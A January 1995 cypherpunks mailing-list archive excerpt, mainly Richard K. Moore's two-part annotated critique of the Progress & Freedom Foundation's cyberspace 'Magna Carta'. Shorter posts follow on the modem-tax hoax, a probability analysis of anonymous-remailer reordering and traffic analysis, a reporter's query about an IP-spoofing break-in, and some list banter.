[  manage to escape notice here. Ah well, so many
[  details, so little time...
[
[  Next, they show how hip they are by pointing out
[  the narrowness of the "superhighway" metaphor, and
[  the aptness of the "cyberspace"
[  metaphor. They break the 2nd-wave bounds of linear
[  ASCII  messaging to give us a brilliant two-
[  dimensional table with which to compare the
[  metaphors in a futuristic light:

_Information Superhighway_   /    _Cyberspace_

Limited Matter               /     Unlimited Knowledge
Centralized                  /     Decentralized
Moving on a grid             /     Moving in space
Government ownership         /     A vast array of
                                   ownerships
Bureaucracy                  /     Empowerment
Efficient but not hospitable /     Hospitable if you
                                   customize it
Withstand the elements       /     Flow, float and
                                   fine-tune
Unions and contractors       /     Associations and
                                   volunteers
Liberation from First Wave   /     Liberation from
                                   Second Wave
Culmination of Second Wave   /     Riding the Third
                                   Wave ...

[  Well, OK, I buy it. I bought it ten years ago.
[
[  ---
[
[  The first major character in the story now makes an
[  appearance. He is brother "private property",
[  endowed by his creator with inalienable rights.
[  Those rights are to be the very
[  cornerstone of the cyberspace frontier:

THE NATURE AND OWNERSHIP OF PROPERTY

Clear and enforceable property rights are essential
for markets to work. Defining them is a central
function of government. Most of us have "known" that
for a long time. But to create the new cyberspace
environment is to create _new_ property -- that is,
new means of creating goods (including ideas) that
serve people.

The property that makes up cyberspace comes in several
forms: Wires, coaxial cable, computers and other
"hardware";  the electromagnetic spectrum; and
"intellectual property" -- the knowledge that dwells
in and defines cyberspace.

[
[  Cyberspace is clearly defined as being a repository
[  for "knowledge  property". This definition is
[  summarized in their phrases:
[
[   "the knowledge that dwells in and defines
[    cyberspace"
[
[     " to create...cyberspace...is to create _new_
[       property"
[
[  They next set out a dichotomy -- we are to decide
[  between two options for cyber-property ownership,
[  private & public:

In each of these areas, two questions that must be
answered. First, what does "ownership" _mean_? What is
the nature of the property itself, and what does it
mean to own it? Second, once we understand what
ownership means, _who_ is the owner? At the level of
first principles, should ownership be public (i.e.
government) or private (i.e. individuals)? ...

[  Brother "private property" is asking to be accepted
[  as  "everyman", to be the character the reader
[  identifies with. He claims to represent the
[  "individual". Well... OK so far. But methinks
[  Plato is entrapping me...
[
[  Is it true that "public" includes no other options
[  than direct government ownership?
[
[  And is it true that "private" means ownership by
[  individuals?
[  And if so, is that all individuals, or a few
[  individuals?
[  The unfolding story will make this clear.
[
[  ---
[
[  They make one really ominous statement in this
[  section:

If this analysis is correct, copyright and patent
protection of knowledge (or at least many forms of it)
may no longer be unnecessary...

[  That word "knowledge" is scary in this context. Do
[  they mean that ideas and facts are to be
[  patentable? We see such a trend
[  in genetic engineering already.
[
[  In the cyberspace context, are they proposing that
[  intellectual concepts themselves will be
[  patentable? If so, then presumably it will happen
[  on a  wholesale basis.
[  Will schools pay knowledge royalties to teach the
[  three R's?
[
[  ---
[
[  Their next section is entitled "THE NATURE OF THE
[  MARKETPLACE". I'll pass most of it along, trimmed
[  by a few ellipses and punctuated by asterisks:

THE NATURE OF THE MARKETPLACE

Inexpensive knowledge destroys economies-of-scale.
Customized knowledge permits"just in time" production
for an ever rising number of *goods*. Technological
progress creates new means of serving old markets,
turning *one-time monopolies* into *competitive
battlegrounds*.

These phenomena are altering the nature of the
marketplace, ...transformed by technological progress
from a "*natural monopoly*" to one in which
competition is the rule.

Three recent examples:

*  The market for "mail" has been made competitive by
the development of fax machines and overnight delivery
...During the past 20 years, the market for television
has been transformed from ... a few broadcast TV
stations to one in which consumers can choose among
broadcast, cable and satellite services.

*  The market for local telephone services, until
recently a monopoly..., is rapidly being made
competitive by the advent of wireless service and the
entry of cable television into voice communication...

The advent of new technology and new products creates
the potential for _dynamic competition...Dynamic
competition is better, because it allows competing
technologies and new products to challenge the old
ones and, if they really are better, to replace them.
Static competition might lead to faster and stronger
horses. Dynamic competition gives us the automobile...

Then the personal-computing industry exploded, leaving
older-style big-business-focused computing with a
stagnant, piece of a burgeoning total market. As IBM
lost market-share, many people became convinced that
America had lost the ability to compete. By the mid-
1980s, such alarmism had reached from Washington all
the way into the heart of Silicon Valley.

But the real story was the renaissance of American
business and technological leadership. In the
transition from mainframes to PCs, a vast new market
was created. This market was characterized by *dynamic
competition* consisting of easy access and low
barriers to entry. Start-ups by the dozens took on the
larger established companies -- and won.

...The reason for America's victory in the computer
wars of the 1980s is that dynamic competition was
allowed to occur, in an area so breakneck and pell-
mell that government would've had a hard time
controlling it _even had it been paying attention_.
The challenge for policy in the 1990s is to permit,
even encourage, dynamic competition in every aspect of
the cyberspace marketplace.

[  The meat of the story is now unfolding. Cyberspace
[  is simply a new mass communications marketplace.
[  The players are telcos, fiber operators, wireless
[  providers, and entrepreneurs of all flavors.
[
[  Consumers play no role in this drama, their benefit
[  comes when they get to choose among the commercial
[  services being arranged for them.
[
[  Brother "private property" who was "the
[  individual" in scene one, has now become a typical
[  corporate board member, dealing with mergers,
[  acquisitions, new-product planning, and new forms
[  of competition.
[
[  Notice the explicit call for *dynamic competition*
[  as being central to a good cyberspace. Watch later
[  how they switch sides on this issue several times.
[
[  ---
[
[  Now on to the next section:

THE NATURE OF FREEDOM

Overseas friends of America sometimes point out that
the U.S. Constitution is unique -- because it states
explicitly that power resides with the people, who
delegate it to the government, rather than the other
way around...

This idea -- central to our free society -- was the
result of more than 150 years of intellectual and
political ferment, from the Mayflower Compact to the
U.S. Constitution, as explorers struggled to establish
the terms under which they would tame a new frontier.

And as America continued to explore new frontiers --
from the Northwest Territory to the Oklahoma land-rush
-- it consistently returned to this fundamental
principle of rights, reaffirming, time after time,
that power resides with the people.

[
[  Those of you with color screens probably noticed
[  the red-white-and-blue background on this
[  stationery.
[
[  The argument has touched deep ground here. Our
[  American heritage, our very duty as American
[  citizens, demands that we agree that power in
[  cyberspace should we reside with "the people".
[
[  Fine, until you find out who "the people"
[  are. Stay tuned.

Cyberspace is the latest American frontier. As this
and other societies make ever deeper forays into it,
the proposition that ownership of this frontier
resides first _with the people_ is central to
achieving its true potential...

[  I'm skipping four long paragraphs of fluff, to the
[  effect that the struggle for freedom never ends,
[  and that this generation must do its part.
[
[  Next comes the second appearance of the leit-motif.
[  The "evil government" character broadens out to
[  represent the entire "2nd Wave" mentality.
[
[  Government itself is possibly one of the 2nd Wave
[  anachronisms to be left behind.
[

*  In a Second Wave world, it might make sense for
government to insist on the right to peer into every
computer by requiring that each contain a special
"clipper chip."

*  In a Second Wave world, it might make sense for
government to assume ownership over the broadcast
spectrum and demand massive payments from citizens for
the right to use it.

*  In a Second Wave world, it might make sense for
government to prohibit entrepreneurs from entering new
markets and providing new services.

*  And, in a Second Wave world, dominated by a few
old-fashioned, one-way media "networks," it might even
make sense for government to influence which political
viewpoints would be carried over the airwaves...

[
[  I just heard about the 3rd Wave last month, and
[  already we're seeing a revisionist history of the
[  2nd Wave.
[
[  What America have these guys been living in? We've
[  encouraged entrepreneurs to enter new markets
[  throughout our history, from railroad building,
[  to mining, to Thomas Edison, John D. Rockefeller,
[  Henry Ford, the aircraft industry, ad infinitum.
[
[  I never made massive payments to the government to
[  watch TV. Which planet are these guys from?
[
[  But they *do* make sense if you accept the
[  equation:
[     "citizen" == "communications company"
[  because communication companies do pay license
[  fees. But those fees are nominal for corporations,
[  though they might seem large to an individual.
[
[  Thus they skate from one meaning of "individual" to
[  the other, even in mid thought.
[
[  ---
[
[  The next section is called THE ESSENCE OF THE
[  COMMUNITY. I'll skip most of it -- it's really
[  vacuous. I'll just give you the last two paragraphs
[  to illustrate the flavor of this idling segment of
[  the storyline:

"...But unlike the private property of today," Salin
continued, "the potential variations on design and
prevailing customs will explode, because many
variations can be implemented cheaply in software. And
the 'externalities' associated with variations can
drop; what happens in one cyberspace can be kept from
affecting other cyberspaces."

"Cyberspaces" is a wonderful _pluralistic_ word to
open more minds to the Third Wave's civilizing
potential. Rather than being a centrifugal force
helping to tear society apart, cyberspace can be one
of the main forms of glue holding together an
increasingly free and diverse society.

-------------------------------------------------
[End of MC Analysis (1/2)]



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Wed, 25 Jan 95 06:00:39 PST
To: cypherpunks@toad.com
Subject: Magna Carta Analyzed (2/2)
Message-ID: <199501251359.NAA14098@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain





Detailed Analysis of PFF's Magna Carta - Part 2 of 2

By: Richard K. Moore
    20 January, 1995


-----------------------------------------------------
[
[
[  This next section is the heart of the story.
[  Evil "government" is to be vanquished by brother
[  "private property" -- watch as the two masks
[  ("individual" and "communications provider")
[  switch back and forth faster than the mind can see.
[

THE ROLE OF GOVERNMENT

The current Administration has identified the right
goal: Reinventing government for the 21st
Century....This said, it is essential that we
understand what it really means to create a Third Wave
government and begin the process of transformation.

...The most pressing need...is to revamp the policies
and programs that are slowing the creation of
cyberspace...if there is to be an "industrial policy
for the knowledge age," it should focus on removing
barriers to competition and massively deregulating the
fast-growing telecommunications and computing
industries...

...the transition from the Second Wave to the Third
Wave will require a level of government _activity_ not
seen since the New Deal....

[  A nice-sounding vision for cyberspace is pulled in
[  from the New York Times:

"The amount of electronic material the superhighway
can carry is dizzying, compared to the relatively
narrow range of broadcast TV and the limited number of
cable channels.  Properly constructed and regulated,
it could be open to all who wish to speak, publish and
communicate. None of the interactive services will be
possible, however, if we have an eight-lane data
superhighway rushing into every home and only a narrow
footpath coming back out. Instead of settling for a
multimedia version of the same entertainment that is
increasingly dissatisfying on today's TV, we need a
superhighway that encourages the production and
distribution of a broader, more diverse range of
programming" (New York Times 11/24/93 p. A25).

[
[  The individualist aspects of this vision play no
[  further part in our story. The sole item adopted
[  by PFF seems to be the requirement for
[  symmetric  bandwidth. Could this be establishing a
[  pecking order between telcos and cable-operators,
[  giving the edge to the telcos with their more
[  symmetric architectures? ... an open question.
[
[  We now come to an amazing shift of ground in our
[  story. Its almost Khafka'esque or even
[  Ionesco'esque in its blatant reversal of
[  established story line.
[
[  What they're going to do is passionately espouse
[  the creation of a gigantic monopoly among the
[  telcos and cable operators to build and operate
[  cyberspace. Even though "dynamic competition" was
[  the rallying cry up to this point, we're now to
[  learn that "contrived competition between phone
[  companies and cable operators" "will not deliver
[  the two-way, multimedia and more civilized tele-
[  society Kapor and Berman sketch."
[

...reducing barriers to entry and innovation [is] the
only effective near-term path to Universal Access.  In
fact, it can be argued that a near-term national
interactive multimedia network is impossible unless
regulators permit much greater **collaboration**
between the cable industry and phone companies. The
latter's huge fiber resources...could be joined with
the huge asset of 57 million broadband links...to
produce a new kind of national network -- multimedia,
interactive and (as costs fall) increasingly
accessible to Americans of modest means.

That is why obstructing such collaboration -- in the
cause of forcing a competition between the cable and
phone industries -- is *socially elitist*. To the
extent it prevents collaboration between the cable
industry and the phone companies, present federal
policy actually thwarts the Administration's own goals
of access and empowerment...

...If Washington forces the phone companies and cable
operators to develop supplementary and duplicative
networks, most other advanced industrial countries
will attain cyberspace democracy -- via an interactive
multimedia "open platform" -- before America does,
despite this nation's technological dominance.

...A contrived competition between phone companies and
cable operators will not deliver the two-way,
multimedia and more civilized tele-society Kapor and
Berman sketch. Nor is it enough to simply "get the
government out of the way." Real issues of antitrust
must be addressed, and no sensible framework exists
today for addressing them. Creating the conditions for
universal access to interactive multimedia will
require a fundamental rethinking of government policy.
[
[  How orwellian can you get? Those of us who bought
[  into the glory of dynamic competition earlier on
[  have now become "socially elitist" -- unless we
[  have a mind which can switch identities and change
[  positions as adroitly as our illustrious authors.
[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            private monopoly
[  ---
[
[  The pace of doublespeak picks up now. In the
[  next section we're back in the "competition" camp,
[  finding out why regulation must be eliminated from
[  the communications game, to be replaced by
[  an anti-trust model.
[

   ...Promoting Dynamic Competition

Technological progress is turning the
telecommunications marketplace from one characterized
by "economies of scale" and "natural monopolies" into
a prototypical competitive market. The challenge for
government is to encourage this shift -- to create the
circumstances under which new competitors and new
technologies will challenge the natural monopolies of
the past.

Price-and-entry regulation makes sense for natural
monopolies. The tradeoff is a straightforward one: The
monopolist submits to price regulation by the state,
in return for an exclusive franchise on the market.

But what happens when it becomes economically
desirable to have more than one provider in a market?
The continuation of regulation under these
circumstances stops progress in its tracks. It
prevents new entrants from introducing new
technologies and new products, while depriving the
regulated monopolist of any incentive to do so on its
own.

Price-and-entry regulation, in short,  is the
antithesis of dynamic competition.

The alternative to regulation is antitrust. Antitrust
law is designed to prevent the acts and practices that
can lead to the creation of new monopolies, or harm
consumers by forcing up prices, limiting access to
competing products or reducing service quality.
Antitrust law is the means by which America has, for
over 120 years, fostered competition in markets where
many providers can and should compete.

The market for telecommunications services --
telephone, cable, satellite, wireless -- is now such a
market...price/entry regulation of telecommunications
services...should therefore be replaced by antitrust
law as rapidly as possible.

...there should be no half steps. Moving from a
regulated environment to a competitive one is -- to
borrow a cliche -- like changing from driving on the
left side of the road to driving on the right: You
can't do it gradually.

[
[  Though the "justification" arguments illogically
[  contradict one another, the "conclusions" of those
[  arguments add up to a coherent proposal.
[
[     What the authors are proposing is an
[           *unregulated monopoly*
[
[     It is not surprising that they had to twist
[     logic several times to pack both words into a
[     manifesto, and make it seem like both are
[     natural and consistent consequences of
[     "competitive spirit" and the "American Dream".
[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            unregulated private monopoly
[  ---
[
[  Next they double-click on property rights:
[

    ...Defining and Assigning Property Rights

...Defining property rights in cyberspace is perhaps
the single most urgent and important task for
government information policy. Doing so will be a
complex task, and each key area -- the electromagnetic
spectrum, intellectual property, cyberspace itself
(including the right to privacy) -- involves unique
challenges. The important points here are:

First, this is a "central" task of government...

Secondly, the key principle of ownership by the people
-- private ownership  -- should govern every
deliberation. *Government does not own cyberspace,
the people do.*...

[
[  Here's where the doublespeak pays off. They can
[  make a statement like "the people own cyberspace"
[  and manage to imply they are empowering
[  the individual, when they've already stated clearly
[  that ownership is to be vested in a large monopoly
[  conglomerate. I must tip my hat to their skill.
[
[  In an earlier review, I described this document as
[  grossly rambling and inconsistent. I now have more
[  respect for it. It's masterfully deceitful, and
[  manages to marshall contradictory arguments in
[  support of a coherent business proposal.
[
[  ---
[
[  We now move to another corporate business concern.
[  Such concerns are clearly the domain of serious
[  discourse addressed in the Magna Carta. The rest of
[  the verbiage is a meaningless, crowd-pleasing
[  smokescreen.
[
[  Here we have a plea for rapid capital depreciation.
[  That would be quite a windfall for a conglomerate
[  investing billions in an infrastructure.
[
[  Once again the taxpayer is asked to subsidize the
[  R&D bill for new technology, but the ownership
[  benefit is to go exclusively to the private
[  operator. This has been the pattern since the New
[  Deal.
[
[

 ...Creating Pro-Third-Wave Tax and Accounting Rules

We need a whole set of new ways of accounting, both at
the level of the enterprise, and of the economy.

...At the level of the enterprise, obsolete accounting
procedures cause us to systematically _overvalue_
physical assets (i.e. property) and _undervalue_
human-resource assets and intellectual assets. So, if
you are an inspired young entrepreneur looking to
start a software company, or a service company of some
kind, and it is heavily information-intensive, you
will have a harder time raising capital than the guy
next door who wants to put in a set of beat-up old
machines to participate in a topped-out industry.

On the tax side, the same thing is true...

It is vital that accounting and tax policies -- both
those promulgated by private-sector regulators like
the Financial Accounting Standards Board and those
promulgated by the government at the IRS and elsewhere
-- start to reflect the shortened capital life-cycles
of the Knowledge Age, and the increasing role of
_intangible_ capital as "wealth."

[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            unregulated private monopoly
[        (3) investment to be written off rapidly
[  ---
[
[  Next they get into a discussion of transforming
[  government. I'm not sure why they're departing
[  from their focused agenda of launching cyberspace
[  as a private monopoly. Perhaps they think they're
[  on a roll, and might as well go for the whole
[  enchilada -- a corporate state.
[

    ...Creating a Third Wave Government

Going beyond cyberspace policy per se, government must
remake itself and redefine its relationship to the
society at large...there are some yardsticks we can
apply to policy proposals...[vacuous ones omitted]

_Does it centralize control_? Second Wave policies
centralize power in bureaucratic institutions; Third
Wave policies work to spread power -- to empower those
closest to the decision...

A serious effort to apply these tests to every area of
government activity  -- from the defense and
intelligence community to health care and education
-- would ultimately produce a complete transformation
of government as we know it. Since that is what's
needed, let's start applying.

[
[  With their usual twists of logic, we'd probably
[  learn that other constellations of private
[  interests, perhaps including additional unregulated
[  monopolies, should be running all these other
[  areas of public life as well.
[
[  The closing section is vacuous but for
[  background smoke. I'll cite a few representative
[  paragraphs...
[

GRASPING THE FUTURE

The conflict between Second Wave and Third Wave
groupings is the central political tension cutting
through our society today. The more basic political
question is not who controls the last days of
industrial society, but who shapes the new
civilization rapidly rising to replace it. Who, in
other words, will shape the nature of cyberspace and
its impact on our lives and institutions?...

The Third Wave sector includes not only high-flying
computer and electronics firms and biotech start-ups.
It embraces advanced, information-driven manufacturing
in every industry...

For the time being, the entrenched powers of the
Second Wave dominate Washington and the statehouses...

...a "mass movement" for cyberspace is still hard to
see. Unlike the "masses" during the industrial age,
this rising Third Wave constituency is highly
diverse...This very heterogeneity contributes to its
lack of political awareness. It is far harder to unify
than the masses of the past.

[  I guess the Magna Carta is to bring about this
[  unity. Perhaps they seek to form an "internet cult"
[  and the Magna Carta is the "mind-programming"
[  formula being trial-posted. I think they'll find
[  most of us not that easily programmed. We're too
[  professionally familiar with the technology of
[  programming, and are equipped to judge the internal
[  consistency of models.

Yet there are key themes on which this constituency-
to-come can agree. To start with, liberation -- from
Second Wave rules, regulations, taxes and laws laid in
place to serve the smokestack barons and bureaucrats
of the past. Next, of course, must come the creation
-- creation of a new civilization, founded in the
eternal truths of the American Idea.

It is time to embrace these challenges, to grasp the
future and pull ourselves forward. If we do so, we
will indeed renew the American Dream and enhance the
promise of American life.

[
[  There you have it. The American Dream and frontier
[  competitiveness lead us inevitably to the following
[  mandate for cyberspace:
[        (1) strong private property rights
[        (2) infrastructure to be owned by an
[            unregulated private monopoly
[        (3) investment to be written off rapidly
[
[  Buying into this vision upholds the honor of
[  our forefathers, fights big government, empowers
[  the  individual, and ushers in the American
[  millennium.
[
[  Simple, succinct...and packed full of lies.
[
[  My only question is: why did the document have to
[  be so long?
[
[ -rkm
[


-----------------------------------------------------
[End of MC Analysis (2/2)]



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 25 Jan 95 10:58:19 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: data charge
In-Reply-To: <v01510102ab4c13015e0e@[152.97.12.101]>
Message-ID: <199501251857.NAA17936@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	If you believe this, there is a boy dying of cancer who wants
to be in the Guiness book of world records for getting the most dollar
bills in the mail.  Its cheaper than a get well card, and besides,
they abolished the get-well card category after Craig Shergold.

	So, mail your dollar to:

	Adam Shostack
	92 Howard St
	Cambridge Ma, 02139

	And help make someone very happy.  :)

	Also, save a copy of this message.  Any time you see something
about a modem tax, post this message in response.  Its a better use of
your stamps.  Really.



| >Two years ago the FCC tried and (with your help and letters of
| >protest) failed to institute regulations that would impose
| >additional costs on modem users for data communications. Now,
| >they are at it again. A new regulation that the FCC is quietly
| >working on will directly affect you as the user of a computer and
| >modem. The FCC proposes that users of modems should pay extra
| >charges for use of the public telephone network which carry their
| >data. In addition, computer network services such as CompuServ,
| >Tymnet, & Telenet would also be charged as much as $6.00 per hour
| >per user for use of the public telephone network. These charges
| >would very likely be passed on to the subscribers. The money is
| >to be collected and given to the telephone company in an effort
| >to raise funds lost to deregulation.  Jim Eason of KGO newstalk
| >radio (San Francisco, CA) commented on the proposal during his
| >afternoon radio program during which, he said he learned of the
| >new regulation in an article in the New York Times. Jim took the
| >time to gather addresses which are given below.

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 25 Jan 95 13:59:01 PST
To: cypherpunks@toad.com
Subject: Remailer
Message-ID: <199501252158.NAA12786@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Louis Cypher (alt.anonymous.messages)

In this message I will analyze message reordering in remailers, and
traffic analysis in remailer webs.

Remailers which immediately resend incoming messages provide no 
security against an attacker who is able to watch all traffic to and 
from the remailer.  Two proposals have been suggested to solve this 
problem, latency and reordering.  In recent discussions, the consensus 
was that message reordering was superior to (and the actual intent of) 
latency.  Reordering is not sufficient, a form of latency is required 
to make it effective.

In this analysis, I assume that the reordering is accomplished by 
keeping a group of n messages at the remailer, and sending a random 
one whenever a new message comes. This is superior to simply waiting 
for n messages to arrive, then sending them all at once (I will show 
this later).

The attack on the reordering remailer is simple. The attacker sends a 
stream of marked messages through the remailer.  After the waiting 
messages have been flushed out, any incoming real message will be 
flushed out of the remailer before more arrive, allowing it to be 
uniquely identified coming and going.  The defense against this is to 
only check the group and send excess messages after a time delay. This 
delay should be the typical time for n real messages to arrive. A 
mixing of approximately n messages is ensured by this process. If 
there is no attack, then the mixing is not quite as good as keeping a 
group of 2n messages.

Here is the math on the reordering schemes:

1) Wait for n messages, then mix and send them all.
	The message is known to be one of those 10 (duh).

2) Keep a group of n messages. Send one of the n+1 when a new one 
	arrives.
	The message could be any message ever sent after arrival.
	That is not useful. How many messages does it take before we are
	90% sure that the message has been sent?

prob that the message has not been sent after x messages is (n/n+1)^x

Prob that it has been sent = 1 - (n/n+1)^x
Messages till 90% prob:  x=ln(.1)/ln(n/n+1)
For n=10, x=24, which is much better then 10 for scheme 1.

3) Accumulate b messages, then send a of them (Scheme 2 is a=1, b=n)
  x = ln(.1)/(ln(a) - ln(b))
  This gives the largest x  for a=1.
  In my example of how to defend against the flood attack, a=n, b=2n
  x = 33
  This is misleading, because it will introduce twice the delay as 
  scheme 2.
  Given the same delay, a=n/2, b=n, one finds that x=16.6
  That is better than batching, but not as good as scheme 2. The 
  smaller x is
  worth it, because a reordering of at least some minimum number of
  messages is ensured.

Some writer proposed changing n randomly to protect against this 
attack. Obviously that would not work. The attack will consist of many 
many more than n messages.

The second issue for consideration is:
Given a web of perfect remailers, how easy is it to identify 
corespondents? Tim has been asking this one for a while.

I assume that there is sufficient traffic through all remailers that 
any message entering the web could be any message leaving the web. 
This can be achieved, even with light traffic, by sending fake 
messages through the web to bit buckets. While they do not improve the 
security of the web as a whole, they help ensure that no tracking of 
messages within the web is possible, forcing it to be treated as a 
black box.
I assume that no correspondents are remailers themselves, and that all 
communications are random (random times with random people). This 
assumtion that all communications are uniformly distributed is 
terrible but....
This analysis only applies to indistinguishable messages. Each 
standard packet size can be thought of as having its own black box (a 
good argument for message splitting and having only one packet size).

To simplify the problem, I am going to treat the web as though it were 
clock driven. Some number of messages enter and leave the web each 
"tick" with no messages staying in the web between ticks.  This is a 
reasonable approximation, with the "tick" being the mean time of 
passage through the web.

Define "f" as the fraction of remailer using population sending a 
message in a given tick. This is also the probability that any 
individual will send a message in a given tick. The probability of a 
given pair of corespondents in a given tick is
	f^2
The probability of a pair of corespondents occurring m times in n 
ticks is
        m
p= 1 - Sum [(f^2)^i (1 - f^2)^(n-i) n! / (i! (n-i)!)]
       i=0

Lets put some numbers in there. If people send 1 message per day on 
average, and one tick is 30 min., then f=1/48. If you watch the web 
for a month you will see 1440 ticks. If the chance probability of your 
sending m messages to your co-conspirator  is too small then you have 
been nabbed.
The condition for that is: p << (1/population)

The results for m=0 to 12 (using the above numbers) are:

m = 0   	p = 4.64811E-1
m = 1   	p = 1.30173E-1
m = 2   	p = 2.56257E-2
m = 3   	p = 3.86587E-3
m = 4   	p = 4.71498E-4
m = 5   	p = 4.81967E-5
m = 6   	p = 4.23687E-6
m = 7   	p = 3.26538E-7
m = 8   	p = 2.23961E-8
m = 9   	p = 1.38336E-9
m = 10  	p = 7.77044E-11
m = 11  	p = 4.00273E-12
m = 12  	p = 1.91774E-13

So, for a remailer using population of 10,000 you had better send less 
than 5 messages per month to your accomplice.  This only gets worse 
the longer you keep it up. You can not send 4 per month, month after 
month.

		Louis Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLybfL6yHUAO76TvRAQFhEwP+OMBMyESk97mVPNJMsoECl0YiJY+xnOqs
PHu3OT6j7igdu64NsAHxduwBLmArpgOFXEtrMBwXTkxzUZq6holJdQ+GPtQi787x
WtXhV2KkipW6z67TMxzjdSN7cVluQiMpnNhTSOpGUDcM8no3JD8/Ti1ficwljVkH
5kNx6RWFEpI=
=pRy3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sorr@eznet.net
Date: Wed, 25 Jan 95 11:21:14 PST
To: cypherpunks@toad.com
Subject: Identity
Message-ID: <199501251909.OAA26291@roch0.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


To whomever:
  I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
address was used by a person who broke into the San Diego supercomputer center 
a month ago. What's toad.com? I got your name from a web search that found an 
old communique.
  Can you be any help? I'm simply trying to reconstruct what happened.
Steve Orr
Gannett Rochester Newspapers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Wed, 25 Jan 95 14:50:45 PST
To: cypherpunks@toad.com
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
Message-ID: <199501252246.AA05835@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Jan 1995, Klaus! von "Aaack Pthoey" Future Prime wrote:

> In a related note, opponents of this modem tax are encouraged to flash
> their headlights at oncoming traffic.

	But, but... I heard that new members of BlackNet have to kill 
a driver who flashes their headlights at them, as part of an initiation 
rite. I know it's true: Klaus! told me so in private e-mail. Is there any 
verification of this? I'm frightened...

CryptNet Franchise 0x6969




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 12:08:27 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: In Re: Modem Tax
In-Reply-To: <v01510106ab4c4e7b1d52@[152.97.12.101]>
Message-ID: <9501252008.AA15469@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rhys Kyraden says:
>         I wanted to oh so thankfully thank all 15 of you who so calmly and
> straightforwardly set me straight on this subject. I must apologize for my
> dire misdeed in presenting this to the list. Maybe you could all form a
> lynch mob, come on down to good ole Tennessee and beat this poor ignorant
> Hillbilly to death, hang him from a tree, and burn a few crosses while your
> at it.

Aw, shucks. Its nice of you to invite us, but I'm a bit busy this
week. Could I send some friends?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Insomnia Gallumbits)
Date: Wed, 25 Jan 95 12:51:05 PST
To: cypherpunks@toad.com
Subject: Re: CP archives?
Message-ID: <199501252047.PAA06237@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <m0rWvRj-0004JGC@s116.slcslip.indirect.com>,
Ed Carp [khijol Sysadmin] <erc@s116.slcslip.indirect.com> wrote:
>Can anyone tell me where the CP mailing list is archived?  Thanks!

In one form or another, it's all on
ftp://hks.net/cypherpunks/{All,nntp/cypherpunks}.  Unfortunately, it's
quite a mess and is worth much unless 

A somewhat better alternate is NNTP:nntp.hks.net, by which the traffic
since June is all available under hks.lists.cypherpunks.

Getting a decent, web-searchable archive up is near the head of my 2nd
tier queue.
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyZ+pRNhgovrPB7dAQGGaAP6A00aoyX0ZFmVj+Cn61/ls/RgkiGKFwLt
APLjbmFmtf6+WrGMnMrEARhgKbAGlOYX7QxShQxyagR09LRBgwNev5zwS9HlWjQZ
0dIqFErdIExUL4DR4ptlznzVtfASbPnZAB1kZ76Pe28QHbutYjH7goVfuwk5SbzT
DwkEgBAGAaU=
=dxNq
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLya4CyoZzwIn1bdtAQGv7AF/UDQyzn/93X45o341yOCvZNsigZfmVu0b
0BwEHFhHghf4gqjVtLy9spqvLZ+cM4G8
=t6c0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 12:49:49 PST
To: cypherpunks@toad.com
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <9501252049.AA15548@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@rahul.net says:
> > Gannett Rochester Newspapers
> 
> Fuck Gannett.

My, thats really constructive. Mr. Nobody is concealing his identity for
good reason -- he's got nothing intelligent to say.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 25 Jan 95 16:07:32 PST
To: cypherpunks@toad.com
Subject: Re: Magna Carta Analyzed
Message-ID: <199501260008.QAA05396@mail.igc.apc.org>
MIME-Version: 1.0
